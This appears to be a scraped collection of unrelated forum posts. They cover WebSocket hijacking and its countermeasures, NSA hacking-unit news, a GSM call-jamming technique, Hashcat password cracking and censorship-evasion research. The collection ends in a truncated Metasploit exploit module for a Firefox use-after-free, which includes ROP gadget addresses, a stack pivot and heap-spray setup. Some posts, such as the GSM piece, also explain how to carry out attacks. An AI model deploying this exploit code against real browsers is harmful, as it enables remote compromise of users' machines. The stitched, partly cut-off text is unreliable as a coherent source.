This protocol doesn't prescribe any particular way that servers can authenticate clients during the WebSocket handshake.
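The server's half of this key exchange is fully specified in RFC 6455: it concatenates the client's Sec-WebSocket-Key with a fixed GUID, hashes the result with SHA-1, and returns the Base64-encoded digest in the Sec-WebSocket-Accept response header. A minimal Python sketch, using the sample key from RFC 6455 itself:

```python
import base64
import hashlib

# Fixed GUID defined in RFC 6455, section 1.3
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

def websocket_accept(sec_websocket_key):
    """Compute the Sec-WebSocket-Accept value for a given Sec-WebSocket-Key."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")

# Sample handshake key taken from RFC 6455, section 1.2
print(websocket_accept("dGhlIHNhbXBsZSBub25jZQ=="))  # -> s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
```

Note that this key exchange only proves that the server speaks the WebSocket protocol; it provides no client authentication whatsoever, which is exactly why the cookie-based authentication discussed here becomes the weak spot.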
The WebSocket server can use any client authentication mechanism available to a generic HTTP server, such as cookies, HTTP authentication, or TLS authentication.

RFC 6455 "The WebSocket Protocol", chapter 10.5 WebSocket Client Authentication

This means developers can use, for example, cookies or HTTP authentication to authenticate the WebSocket handshake request, as if it were a regular HTTP(S) web application request.

Hijacking it cross-site

Now let's consider what happens when a developer follows this well-known style of using session cookies to authenticate the WebSocket handshake/upgrade request within a logged-in (sensitive) part of a web application: Because WebSockets are not restrained by the same-origin policy, an attacker can easily initiate a WebSocket request (i.e. the handshake/upgrade process) from a malicious webpage targeting the ws:// or wss:// endpoint URL of the attacked application (the stock service in our example). Due to the fact that this request is a regular HTTP(S) request, browsers send the cookies and HTTP authentication headers along, even cross-site. Take a look at the WebSocket handshake/upgrade request when issued from a malicious webpage cross-site (visited by the victim while logged in to our stock trading application).
Here the WebSocket endpoint wss://www.some-trading-application.com/trading/ws/stockPortfolio is accessed from a malicious webpage at https://www.some-evil-attacker-application.com

"GET /trading/ws/stockPortfolio HTTP/1.1"
Host: www.some-trading-application.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Sec-WebSocket-Version: 13
[COLOR=#0000ff]Origin: https://www.some-evil-attacker-application.com[/COLOR]
Sec-WebSocket-Key: hP+ghc+KuZT2wQgRRikjBw==
[COLOR=#ff0000]Cookie: JSESSIONID=1A9431CF043F851E0356F5837845B2EC[/COLOR]
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

As you can see, the browser sends the authentication information (in this example the session cookie) along with the WebSocket handshake/upgrade request. This is very similar to a Cross-Site Request Forgery (CSRF) attack scenario, but in the WebSocket scenario the attack can be extended from a write-only CSRF attack to full read/write communication with a WebSocket service, by physically establishing a new WebSocket connection with the service under the same authentication data as the victim. Therefore I call this attack vector Cross-Site WebSocket Hijacking (CSWSH).

Effectively this allows the attacker in our scenario to read the victim's stock portfolio updates pushed via the WebSocket connection and to update the portfolio by issuing write requests via the WebSocket connection. This is possible because the server's WebSocket code relies on the session authentication data (cookies or HTTP authentication) sent along from the browser during the WebSocket handshake/upgrade phase.

Another interesting observation is the Origin header that is sent along with the WebSocket handshake/upgrade request.
This is like the Origin header in a regular CORS request utilizing Cross-Origin Resource Sharing: if this were a regular HTTP(S) CORS request, the browser would not let the JavaScript on the malicious webpage see the response when the server does not explicitly allow it (via a matching Access-Control-Allow-Origin response header). But when it comes to WebSockets, this "fail closed" style of defaulting to "restrict response access" when the server does not explicitly allow cross-origin requests is inverted: in our example the server did not send any CORS response headers along, but the cross-site WebSocket request's response is still handled by the browser, by properly establishing the full-duplex WebSocket connection. This demonstrates that WebSockets are not protected by the same-origin policy, so developers must not rely on this protection when developing WebSocket-based applications. Clearly the CORS mechanism has nothing to do with WebSockets as such; they merely happen to use the same request header (Origin).

Securing it

As you've already noticed, securing an application against Cross-Site WebSocket Hijacking (CSWSH) attacks can be achieved using two countermeasures:

Check the Origin header of the WebSocket handshake request on the server!
Use session-individual random tokens (like CSRF tokens) on the handshake request and verify them on the server.

These simple but effective protections must be used as soon as you're using WebSockets inside an application which accesses the web session on the server side to communicate and/or accept private data via the WebSocket channel. If you don't need to access the web session from the server-side WebSocket counterpart, just handle authorization and/or authentication separately, using custom tokens or similar techniques within your WebSocket protocol, and avoid tying it to the web session via cookies or HTTP authentication of the handshake request.
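The first countermeasure, the server-side Origin check, is only a few lines of code. Here is a minimal Python sketch; the function name and the allowlist are illustrative (real frameworks expose the handshake headers in their own ways), not taken from any particular WebSocket library:

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of origins permitted to open WebSocket connections
ALLOWED_ORIGINS = {"https://www.some-trading-application.com"}

def is_handshake_allowed(headers):
    """Reject a WebSocket upgrade unless its Origin header is on the allowlist.

    An absent or unknown Origin may mean the handshake comes from an
    attacker-controlled page, so we fail closed.
    """
    origin = headers.get("Origin")
    if origin is None:
        return False
    # Normalize: compare scheme and host exactly, never by substring match
    parts = urlsplit(origin)
    normalized = "%s://%s" % (parts.scheme, parts.netloc)
    return normalized in ALLOWED_ORIGINS

# The cross-site handshake from the example above would be rejected:
print(is_handshake_allowed({"Origin": "https://www.some-evil-attacker-application.com"}))  # False
print(is_handshake_allowed({"Origin": "https://www.some-trading-application.com"}))        # True
```

The exact-match comparison matters: a naive substring check like `"some-trading-application.com" in origin` would also accept an attacker domain such as `some-trading-application.com.evil.example`.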
Conclusion

As a pentester: Check for Cross-Site WebSocket Hijacking (CSWSH) attacks as soon as you notice any WebSocket-based communication in the application you're analysing.

As a security consultant: Make your clients aware of the requirement to check Origin headers and educate them to secure all WebSocket handshakes using random tokens, as when protecting against CSRF attacks.

As a developer: Make sure you are aware of this attack scenario and know how to employ the countermeasures securely in your application (at least when you need to access the web session from the application part that uses WebSockets or when you otherwise transfer non-public data over that channel). Better yet, avoid accessing the web session from the server-side WebSocket counterpart and separately handle authorization and/or authentication using tokens or similar techniques within your protocol.

by Christian Schneider on August 31st, 2013

Sursa: Cross-Site WebSocket Hijacking (CSWSH)
  13. The NSA has its own team of elite hackers

By Andrea Peterson, Published: August 29 at 4:51 pm

NSA headquarters at Fort Meade, MD where TAO’s main team reportedly works (Wikipedia)

Our Post colleagues have had a busy day. First, they released documents revealing the U.S. intelligence budget from National Security Agency (NSA) leaker Edward Snowden. Then they recounted exactly how the hunt for Osama bin Laden went down. In that second report, Craig Whitlock and Barton Gellman shared a few tidbits about the role of the government’s hacking unit, Tailored Access Operations (TAO), in the hunt, writing that TAO “enabled the NSA to collect intelligence from mobile phones that were used by al-Qaeda operatives and other ‘persons of interest’ in the bin Laden hunt.”

So just what is Tailored Access Operations? According to a profile by Matthew M. Aid for Foreign Policy, it’s a highly secret but incredibly important NSA program that collects intelligence about foreign targets by hacking into their computers, stealing data, and monitoring communications. Aid claims TAO is also responsible for developing programs that could destroy or damage foreign computers and networks via cyberattacks if commanded to do so by the president. So TAO might have had something to do with the development of Stuxnet and Flame, malware programs thought to have been jointly developed by the U.S. and Israel. The malware initially targeted the Iranian nuclear program, but quickly made its way into the digital wild.

According to Aid, TAO’s primary base is in the NSA headquarters in Fort Meade. There, he says, some 600 members of the unit work rotating shifts 24-7 in an “ultramodern” space at the center of the base called the Remote Operations Center (ROC). The unit bears a striking resemblance to a Chinese hacking group described in a report released by cybersecurity company Mandiant earlier this year. The report indicated that that group, APT1, was likely organized by the Chinese military.
Perhaps not so coincidentally, Aid says multiple confidential sources have told him that TAO has “successfully penetrated Chinese computer and telecommunications systems for almost 15 years,” in the process, “generating some of the best and most reliable intelligence information about what is going on inside the People’s Republic of China.” But for all the reported secrecy surrounding TAO’s activities, a quick search of networking site LinkedIn shows a number of current and former intelligence community employees talking pretty openly about the exploits. For instance, Brendan Conlon, whose page lists him as a former Deputy Chief of Integrated Cyber Operations for the NSA and former Chief of TAO in Hawaii, says that he led “a large group of joint service NSA civilians and contractors in executing Computer Network Exploitation (CNE) operations against target networks.” Barbara Hunt, who is listed as a former Director of Capabilities at TAO in Fort Meade, similarly claims she was “responsible for end-to-end development and capability delivery to build a versatile computer network exploitation effort.” Dean Schyvincht, who claims to currently be a TAO Senior Computer Network Operator in Texas, might reveal the most about the scope of TAO activities. He says the 14 personnel under his management have completed “over 54,000 Global Network Exploitation (GNE) operations in support of national intelligence agency requirements.” Just imagine how productive the team in Fort Meade, rumored to have about 600 people, must be. Sursa: The NSA has its own team of elite hackers
  14. Anatomy of a dropped call - how to jam a city with 11 customised mobile phones by Paul Ducklin on August 29, 2013 When you think of "signal jamming," you probably imagine some kind of fine steel mesh that blocks out radio transmissions altogether, or a source of electromagnetic noise that interferes enough to make legitimate communication impossible. But a paper presented by a trio of German researchers at the recent USENIX Security Symposium reveals a much more subtle approach to jamming mobile phone calls. They were able to convert a single mobile phone into a denial of service (DoS) device that could be turned against another subscriber, perhaps wherever they roamed through a whole town or city. The paper is quite technical, and unavoidably filled with the jargon of mobile telephony, yet the authors have done an excellent job of making it into a comprehensible read that teaches you a number of useful security lessons. As they point out very clearly, many of the security decisions taken in the early days of the GSM (Global System for Mobile) system were based at least in part on security through obscurity. The consensus back then seemed to be, "Nobody will ever be able to build their own base station, or make their own handset!" So why bother going to the trouble of designing in security to protect against the hardware and firmware of the network itself turning hostile? All that has changed, with open source implementations available for both base stations and handsets. As a result, security shortcuts that didn't seem to matter much 20 years ago have come back to haunt us. How your phone receives a call Mobile phones aren't in a perpetual state of readiness to receive calls or SMSes (text messages) instantaneously. Instead, your phone spends most of its time in a low-power mode, from which it can be signalled to wake up fully to accept a call or message. 
(That's why your phone battery may well last for days when you aren't making or receiving calls, but typically only hours when you are.)

Rather casually simplified, and with apologies to the authors of the USENIX paper, this is what happens when a nearby cell tower decides it's time for you to get a call:

1. The base station sends out a broadcast page containing an identification code for your phone.
2. Your phone recognises its own identification code.
3. Your phone wakes up and responds to the base station.
4. The base station and your phone negotiate a private radio channel for the call.
5. Your phone authenticates to the base station.
6. Your phone starts ringing (or an SMS arrives).

How an attacker can "jam" your calls

You can probably spot what computer scientists call a race condition in the sequence above, caused by the fact that authentication happens late in the game. Every device in range can listen in to the broadcast pages inviting your phone to wake up, so a device that's faster than yours can race you to step 5 and win, causing your phone's attempt to authenticate to be rejected. Of course, the "jamming" phone doesn't know how to authenticate, but that doesn't matter; in fact, it can deliberately fail the authentication, causing the process to bail out at step 5. There is no step 6, so the call is lost - invisibly to you, because you lost the race to reply - and service is denied.

The authors got this attack working with a tweaked open source baseband (mobile phone firmware) that was adapted to ensure that it ran faster than a wide range of commercial handsets, including the Apple iPhone 4s, Samsung Galaxy S2 and BlackBerry 9300 Curve.

How an attacker finds your phone

There is no authentication or encryption during the "are you there?" message and the "here I am!" reply, so an attacker doesn't need any cryptographic cleverness to work out which messages are meant for which devices.
There is a slight complication, however: the attacker probably doesn't know your phone's identification code in advance.

To be strictly correct: the code is tied to your SIM card, not to the phone hardware itself, since every SIM has a unique code called an IMSI (International Mobile Subscriber Identity) burned into it, rather like the MAC address in a network card. But GSM phones deliberately minimise the frequency with which unencrypted IMSIs are visible on the network, in order to provide you with some safety and privacy against being tracked too openly. Instead, occasional exchanges involving your true IMSI are used to produce a regularly changing TMSI, where T stands for Temporary. The TMSI is a pseudorandom, temporary identifier that varies as a matter of course as you turn your phone off and on or roam through a network. The network operator maintains a list to keep track of which TMSI relates to which IMSI at any moment, but that database is unlikely to be accessible to an attacker.

The authors used traffic analysis to get round this problem. While sniffing all the TMSIs being broadcast on the network, they call your number 10 to 20 times in quick succession, but deliberately drop each call after a few seconds. The TMSI that suddenly appears 10 to 20 times in quick succession in the sniffer logs, as the network tries to track you down with its broadcast pages, is almost certainly the one they want. Easy, isn't it?

As long as they drop the call after the TMSI has been sent in a broadcast page but before your phone gets past the authentication stage (step 5 above), your phone won't ring and the imposter calls won't show up. That means you won't be aware that anything dodgy is going on. The authors used trial and error to determine a suitable call-drop delay for the network provider they targeted, finding that 3.7 seconds worked well.

How the attacker finds out which cell you are in

Here's the thing: he doesn't need to know more than your general location.
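The traffic-analysis trick is easy to sketch in code. Assuming we have a log of TMSIs sniffed from the paging channel while the attacker placed the burst of 10 to 20 dropped calls (the function, thresholds and sample data below are illustrative, not taken from the paper):

```python
from collections import Counter

def guess_victim_tmsi(sniffed_tmsis, burst_size=15, tolerance=5):
    """Pick the TMSI whose paging count best matches the number of bogus calls.

    sniffed_tmsis: list of TMSI values seen in broadcast pages while the
    attacker placed `burst_size` calls and dropped each one early.
    """
    counts = Counter(sniffed_tmsis)
    # The victim's TMSI should appear roughly once per bogus call;
    # background traffic pages each other TMSI far less often.
    candidates = [t for t, n in counts.items()
                  if abs(n - burst_size) <= tolerance]
    # Return the closest match, or None if the burst wasn't visible
    return min(candidates, key=lambda t: abs(counts[t] - burst_size), default=None)

# Background pages for two random subscribers, plus 14 pages for the victim
log = ["0x1a2b"] * 2 + ["0x9f31"] * 14 + ["0x77c0"] * 3
print(guess_victim_tmsi(log, burst_size=15))  # -> 0x9f31
```

In practice the attacker would also repeat the burst and intersect the candidate sets, to rule out an unlucky subscriber who happened to receive a similar flurry of pages at the same moment.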
When you receive a call, the mobile network doesn't page for your phone only in one cell of the network - it pages throughout your location area, which is a cluster of base stations in the vicinity. This means that the network doesn't need to keep precise tabs on you all the time, which in turn means that your phone doesn't have to tell the network exactly where it is from moment to moment, thus extending battery life. So as long as I know you are somewhere, say, in the City of Sydney, I can sit in a coffee shop at the Opera House and sniff for your TMSI wherever you go in town, because the broadcast pages that go out when I make those 10 to 20 bogus calls are duplicated everywhere in the location area. The authors did some warmapping drives around Berlin, their home turf, and determined that location areas can be very extensive, ranging from 100km2 to 500km2. (For comparison, the City of Sydney, which stretches from the Harbour Bridge south as far as Central Station, is just 25km2.) How the attacker can amplify the attack Instead of looking out for your TMSI and blocking your calls, what if the attacker wanted to block every call to knock a large metro area out in one go? One rigged sniffer phone alone couldn't do it. The authors found that although their tweaked phone baseband could beat many popular mobile phones in the race to authenticate, it still took about one second to "jam" each broadcast page, limiting each phone to about 60 "jammed" pages per minute. So they built a rig with eleven tweaked phones, thus allowing them to subvert more than 600 broadcast pages per minute. Their measurements suggested this would be enough to knock out the service of at least some of the four major German operators across one location area (100km2 - 500km2) in metro Berlin. Remember that the eleven attack phones don't have to be distributed through the location area, since all broadcast pages are replicated through all cells in the area. 
The only problem the authors faced was how to allocate the TMSI broadcasts amongst their eleven tweaked phones. Using a messaging system to hand out each successively sniffed TMSI to the next phone on the list required a serial connection to each phone, which was too slow. In the end, they simply allowed each phone to select TMSIs by a bit pattern, so that phone 1, for example, might handle TMSIs starting with the bytes 0x00 to 0x1F, and so on.

As an amusing side-effect of tuning the partitioning algorithm to ensure that each phone handled about the same quantity of broadcast pages, the authors noticed that the bytes in most TMSIs were far from randomly distributed. Ironically, in this case, the lack of randomness made the partitioning job harder, not easier.

What about interception, not just jamming?

As the authors note, in some mobile networks they could go further than just cancelling your calls and knocking you off the network. They observed that some networks, presumably for performance reasons, cheat a little on step 5 and don't authenticate every call. In these cases, an attacker who can win the race to the authentication stage (step 5 above) can do more than cancel your call - he can accept it instead (or receive your SMS), from anywhere in your location area, and you won't realise.

Also, some networks still use outdated, broken versions of the A5 encryption algorithm that is part of the GSM standard. On these networks, your calls can be sniffed and decrypted anyway, but in a busy metro area an attacker faces a problem of volume: how to home in automatically on only the calls he really wants to intercept, without having to listen to everyone else's chatter too. The authors' "jamming" firmware could be modified to do just that job, used as a call-alerting mechanism instead of for denial of service.
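The bit-pattern partitioning the authors settled on can be sketched as follows. The exact ranges here are illustrative: the paper only says that each phone claimed TMSIs by leading-byte pattern, and that the split had to be tuned because TMSI bytes turned out not to be uniformly distributed.

```python
def phone_for_tmsi(tmsi, num_phones=11):
    """Statically assign a sniffed TMSI to one of the attack phones.

    Each phone owns a contiguous range of leading-byte values, so no
    coordination (and no slow serial messaging) is needed at attack time.
    """
    # 256 possible leading bytes, split as evenly as possible across phones
    return tmsi[0] * num_phones // 256

# Example: a TMSI starting with 0x00 goes to phone 0, one with 0xFF to phone 10
print(phone_for_tmsi(bytes.fromhex("00a1b2c3")))  # -> 0
print(phone_for_tmsi(bytes.fromhex("ffa1b2c3")))  # -> 10
```

A static mapping like this is exactly what made the attack scale: every phone can decide locally, in constant time, whether a freshly sniffed broadcast page is its job to race.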
Sniffing the call data for later decryption can't be done from anywhere in the location area, which is a small mercy, so an attacker needs to be in the same cell as you.

What to do about it?

You can probably guess what mitigations the authors proposed, because they are obvious and easy to state; you will also probably wonder if they will ever happen, because they involve change, and potentially disruptive change at that, so they are hard to do.

Defending against the eavesdropping and call hijacking problems is straightforward: perform authentication for every call or SMS, and don't use broken versions of the GSM cipher. The system already supports everything that's needed; all that is required is for it to be turned on and used by every operator.

Defending against the denial of service problem is slightly trickier, as it needs a protocol change: move authentication up the batting order to prevent the race condition. The authors propose a technically simple way to do this, but it means shifting some of the cryptographic operations from the authentication stage (step 5 above) to the "are you there?"/"here I am!" stages (steps 1 and 2).

Unfortunately, these mitigations don't include steps you can take to help yourself; they need changes from the mobile operators. Will that happen? Or will backward compatibility, the thorn that is making Windows XP so hard to dislodge, get in the way yet again?

Sursa: Anatomy of a dropped call – how to jam a city with 11 customised mobile phones | Naked Security
  15. Apple's new technology will allow government to control your iPhone remotely

Author: Mohit Kumar, The Hacker News

Recently, social media has been buzzing over reports that Apple has invented a new technology that can switch off an iPhone's camera and Wi-Fi when it enters a 'sensitive area'. The technology would broadcast a signal to automatically shut down smartphone features, or even the entire phone.

Yes, it's true. In June 2008, Apple filed a patent (U.S. Patent No. 8,254,902), titled “Apparatus and methods for enforcement of policies upon a wireless device”, that defines the ability of the U.S. government to remotely disable certain functions of a device without user consent. All they need to do is decide that a public gathering or venue is deemed sensitive and needs to be protected from externalities. Is it not a shame that you can't take a photo of a police officer beating a man in the street because your oppressive government remotely disabled your smartphone camera? Civil liberties campaigners fear it could be misused by the authorities to silence 'awkward citizens'.

Apple insists that the affected locations would normally be cinemas, theaters and concert grounds, but Apple admits it could also be used in covert police or government operations that may need complete blackout conditions.

"This technology would be a dangerous power to place in the hands of the government," said Kurt Opsahl, a civil liberties lawyer at the Electronic Frontier Foundation (EFF). "The government shutting down iPhone cameras and connectivity in order to prevent photos of political activity or the organization of the event would constitute a prior restraint on the free speech rights of every person affected, whether they're an activist or an observer," he added.

Apple also says that the user can be given a choice to approve changes being sent remotely; however, one cannot rule out the possibility of some changes being applied to the device without user consent.
Sursa: Apple's new technology will allow government to control your iPhone remotely - The Hacker News
  16. Yes, a couple more things could be made configurable:
1. The interval at which it checks for new posts
2. The timeout for that popup
Nice work.
  17. Yeah, too bad it's written in Ruby.
  18. Metasploit - The Exploit Learning Tree

Author: Mohan Santokhi

This is a whitepaper called "Metasploit - The Exploit Learning Tree". Instead of being just another document discussing how to use Metasploit, the purpose of this document is to show you how to look deeper into the code and decipher how the various classes and modules hang together to produce the various functions.

References:
1. /documentation/developers_guide.pdf
2. http://dev.metasploit.com/documents/meterpreter.pdf
3. external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun_manual.pdf
4. www.nologin.org/Downloads/Papers/remote-library-injection.pdf
5. www.nologin.org/Downloads/Papers/win32-shellcode.pdf
6. Metasploit Unleashed
7. http://www.securitytube.net/groups?operation=view&groupId=10

Table of Contents:
1 Document Control
1.1 Document Block
1.2 Change History
1.3 References
2 Table of Contents
3 Introduction
4 Setup
4.1 Getting started
4.2 Install Missing Gems
4.3 Test the environment
5 Exploit Metamodel
6 Vulnerable Service
7 msfconsole Initialisation Phase
8 Use command
9 Set command
10 Exploit command
10.1 Create Payload Objects
10.2 Generate Encoded Payload
10.3 Start handler
10.4 Exploit The Target
10.5 Establish Session
10.6 Interact With Target
11 Meterpreter
11.1 Meterpreter payloads
11.2 Client components
11.2.1 UI components
11.2.2 Command proxy components
11.3 Meterpreter Protocol
11.3.1 Client side protocol API
11.3.2 Server side protocol API
11.4 Server components
11.5 Server extensions
12 Writing Meterpreter Extensions
12.1 Design commands, requests and responses
12.2 Implement skeleton extension
12.3 Implement command dispatcher class
12.4 Implement command proxy class
13 Railgun
13.1 Meterpreter scripts

Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/metasploit-the-learning-tree.pdf

Source: Metasploit - The Exploit Learning Tree - Packet Storm
  19. The Future is Here: C++ 11

Published on 28.08.2013

Special Guest Lecture by C++ Inventor Bjarne Stroustrup
  20. Older accounts, like mine, already had 25 GB.
  21. Visual Studio 2013 IDE

Posted: 16 hours ago
By: Robert Green

In this episode, Robert is joined by Cathy Sullivan, who shows us some of the many enhancements to the Visual Studio 2013 development environment, including:

Signing into the IDE to synchronize your settings [00:40]
Notifications center [06:00]
Improvements to overall look and feel [11:30]
Auto brace completion [16:00]
Enhanced scroll bar [18:45]
Improved Navigate To experience [20:00]
Peek Definition [22:00]
CodeLenses [24:50]

Video: Visual Studio 2013 IDE | Visual Studio Toolbox | Channel 9
  22. From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS

Posted: 1 day ago
By: Charles

This interview never shipped on C9, but why keep it hidden when we don't have to? From the archives, Erik Meijer and Mark Shields join us for a chat about compiling MSIL to JS. Erik!!! Tune in. Enjoy.

Video: From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS | Charles | Channel 9
  23. Hashcat Can Now Be Used to Crack 55-Character Passwords

August 28th, 2013, 11:38 GMT · By Eduard Kovacs

The developers of oclHashcat have released a new version of the popular password cracking tool. The latest release is capable of cracking passwords that are made of up to 55 characters.

A lot of sensitive data is leaked these days by hackers. While in most cases the leaked passwords are encrypted, it's becoming easier for cybercriminals to crack the hashes.

The latest version of oclHashcat supports several new algorithms and GPUs. Various other changes have been implemented, but the most important is the fact that the tool can now be used to crack passwords that are longer than 15 characters.

The developers admit that performance is negatively impacted by adding support for longer passwords. However, they claim this was "by far one of the most requested features."

"We can crack passwords up to length 55, but in case we're doing a combinator attack, the words from both dictionaries can not be longer than 31 characters. But if the word from the left dictionary has the length 24 and the word from the right dictionary is 28, it will be cracked, because together they have length 52," Jens Steube, the lead Hashcat developer, wrote in the release notes.

Source: Hashcat Can Now Be Used to Crack 55-Character Passwords
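The length rules Steube describes can be expressed compactly. A small illustrative sketch (plain Ruby, not part of oclHashcat; the constants are simply the limits quoted in the release notes):

```ruby
# Limits quoted in the oclHashcat release notes: candidates up to 55
# characters overall, and in a combinator attack each dictionary word
# may be at most 31 characters long.
MAX_CANDIDATE = 55
MAX_COMBINATOR_WORD = 31

# Returns true if a left/right word pair from a combinator attack
# produces a candidate within the supported limits.
def combinator_candidate_ok?(left, right)
  left.length <= MAX_COMBINATOR_WORD &&
    right.length <= MAX_COMBINATOR_WORD &&
    left.length + right.length <= MAX_CANDIDATE
end

puts combinator_candidate_ok?("a" * 24, "b" * 28)  # the 24 + 28 = 52 example from the notes
puts combinator_candidate_ok?("a" * 32, "b" * 10)  # left word exceeds the 31-character limit
```

Note that both conditions matter: a 28 + 28 pair stays under 31 per word but exceeds the 55-character total, so it would be rejected as well.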
  24. Evading Internet Censorship

This research project by Brandon Wiley -- the tool is called "Dust" -- looks really interesting. Here's the description of his Defcon talk:

Abstract: The greatest danger to free speech on the Internet today is filtering of traffic using protocol fingerprinting. Protocols such as SSL, Tor, BitTorrent, and VPNs are being summarily blocked, regardless of their legal and ethical uses. Fortunately, it is possible to bypass this filtering by reencoding traffic into a form which cannot be correctly fingerprinted by the filtering hardware. I will be presenting a tool called Dust which provides an engine for reencoding traffic into a variety of forms. By developing a good model of how filtering hardware differentiates traffic into different protocols, a profile can be created which allows Dust to reencode arbitrary traffic to bypass the filters.

Dust is different than other approaches because it is not simply another obfuscated protocol. It is an engine which can encode traffic according to the given specifications. As the filters change their algorithms for protocol detection, rather than developing a new protocol, Dust can just be reconfigured to use different parameters. In fact, Dust can be automatically reconfigured using examples of what traffic is blocked and what traffic gets through. Using machine learning, a new profile is created which will reencode traffic so that it resembles that which gets through and not that which is blocked.

Dust has been created with the goal of defeating real filtering hardware currently deployed for the purpose of censoring free speech on the Internet. In this talk I will discuss how the real filtering hardware works and how to effectively defeat it.

Download: http://blanu.net/Dust.pdf

Source: https://www.schneier.com/blog/archives/2013/08/evading_interne.html
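To make the fingerprinting idea concrete: one common DPI heuristic is byte entropy, since encrypted protocols (SSL, Tor) produce near-uniform byte distributions. The sketch below is purely illustrative (plain Ruby; the 7.0 bits/byte threshold is a hypothetical filter rule, and the hex transform is a deliberately naive stand-in for Dust's actual encoding, which is learned from traffic samples):

```ruby
# Naive model of an entropy-based DPI filter, plus a trivial "reencoder"
# that hex-encodes ciphertext so it no longer looks uniformly random.

# Shannon entropy in bits per byte (max 8.0 for uniform random bytes).
def shannon_entropy(data)
  n = data.bytesize.to_f
  data.each_byte.tally.values.sum { |c| p = c / n; -p * Math.log2(p) }
end

# Hypothetical filter rule: near-uniform payloads get blocked.
def looks_like_ciphertext?(packet)
  shannon_entropy(packet) > 7.0
end

# Ciphertext -> printable cover text (16 symbols, ~4 bits/byte entropy).
def reencode(packet)
  packet.unpack1("H*")
end

# Reverse transform on the receiving side.
def decode(cover)
  [cover].pack("H*")
end

ciphertext = Random.bytes(1500)       # stands in for one encrypted packet
cover = reencode(ciphertext)
# cover passes the entropy filter, and decode(cover) == ciphertext
```

The obvious cost is that the cover traffic doubles in size and has its own recognizable shape, which is exactly why Dust derives the target encoding from samples of traffic that is known to pass the filter rather than hard-coding one transform.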
  25. Firefox XMLSerializer Use After Free

Authored by regenrecht, juan vazquez | Site metasploit.com

This Metasploit module exploits a vulnerability found in Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object when using the serializeToStream method with a specially crafted OutputStream that defines its own write function. The module has been tested successfully against Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox XMLSerializer Use After Free',
      'Description'    => %q{
          This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically
        a use-after-free of an Element object, when using the serializeToStream method
        with a specially crafted OutputStream defining its own write function. This
        module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0
        on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'regenrecht',  # Vulnerability Discovery, Analysis and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0753' ],
          [ 'OSVDB', '89021' ],
          [ 'BID', '57209' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-006/' ],
          [ 'URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-16.html' ],
          [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=814001' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'PrependMigrate' => true
        },
      'Payload'        =>
        {
          'BadChars'    => "\x00",
          'DisableNops' => true,
          'Space'       => 30000 # Indeed a sprayed chunk, just a high value where any payload fits
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Firefox 17 / Windows XP SP3',
            {
              'FakeObject'   => 0x0c101008, # Pointer to the Sprayed Memory
              'FakeVFTable'  => 0x0c10100c, # Pointer to the Sprayed Memory
              'RetGadget'    => 0x77c3ee16, # ret from msvcrt
              'PopRetGadget' => 0x77c50d13, # pop # ret from msvcrt
              'StackPivot'   => 0x77c15ed5, # xchg eax,esp # ret from msvcrt
            }
          ]
        ],
      'DisclosureDate' => 'Jan 08 2013',
      'DefaultTarget'  => 0))
  end

  def stack_pivot
    pivot =  "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18] # get teb
    pivot << "\x83\xC0\x08"              # add eax, byte 8    # get pointer to stacklimit
    pivot << "\x8b\x20"                  # mov esp, [eax]     # put esp at stacklimit
    pivot << "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000     # plus a little offset
    return pivot
  end

  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    vprint_status("Agent: #{agent}")

    if agent !~ /Windows NT 5\.1/
      print_error("Windows XP not found, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    unless agent =~ /Firefox\/17/
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    # Fake object landed on 0x0c101008 if heap spray is working as expected
    code = [
      target['FakeVFTable'],
      target['RetGadget'],
      target['RetGadget'],
      target['RetGadget'],
      target['RetGadget'],
      target['PopRetGadget'],
      0x88888888, # In order to reach the call to the virtual function, according to regenrecht's analysis
    ].pack("V*")

    code << [target['RetGadget']].pack("V") * 183 # Because you get control with "call dword ptr [eax+2F8h]", where eax => 0x0c10100c (fake vftable pointer)
    code << [target['PopRetGadget']].pack("V")    # pop # ret
    code << [target['StackPivot']].pack("V")      # stack pivot # xchg eax,esp # ret
    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})

    js_code   = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
    js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))
